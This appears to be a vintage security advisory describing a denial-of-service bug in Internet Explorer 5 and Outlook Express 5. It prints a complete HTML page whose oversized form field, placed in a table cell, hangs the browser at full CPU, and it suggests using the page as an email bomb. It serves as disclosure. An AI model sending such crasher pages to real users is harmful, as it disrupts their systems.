COMMAND

    Internet Explorer and Outlook Express

SYSTEMS AFFECTED

    IE5 and OE5

PROBLEM

    Neon Bunny found following.   He discovered a little problem  that
    would cause IE5 to "hang".  The problem lies in the fact that  IE5
    can't place large HTML form text  fields in a HTML table cell.   A
    page which contains  the source below  hangs IE5 as  does anything
    which  uses  it's  html  control  like  the  preview  section   of
    Interdev(SP3),  FrontPage  Express  and  more importantly the HTML
    email reading section of Outlook  Express 5.  It also  causes 100%
    processor usage until the offending process is killed.

    He has tested this on Windows  98 and Windows 2000, both of  which
    are affected,  although Netscape  4.6 allows  the table's  cell to
    resize around the large text field and so isn't affected.

    <html>

    <head>
      <title>NeonBunny's IE5 Crasher</title>
    </head>

    <body>

      <form method="POST">

        <table>
          <tr>
            <td width="20%"><input type="text" name="State" size="99999999"
    maxlength="99999999" value=""></td>
          </tr>
        </table>

      </form>
    </body>
    </html>

    Seems  that  Eudora  (don't  know  which  version,  but ASSume the
    "latest")  can  do  interesting  things  with  HTML  code snippets
    included in email.  Bingo, email bomb for "some" Eudora clients.

SOLUTION

    Microsoft  view  is  that  this  doesn't  cut  the  mustard  as  a
    vulnerability, its just one of those endless loop thingies.   Kill
    IE and don't go to the site...!?  Well, Netscape works great too!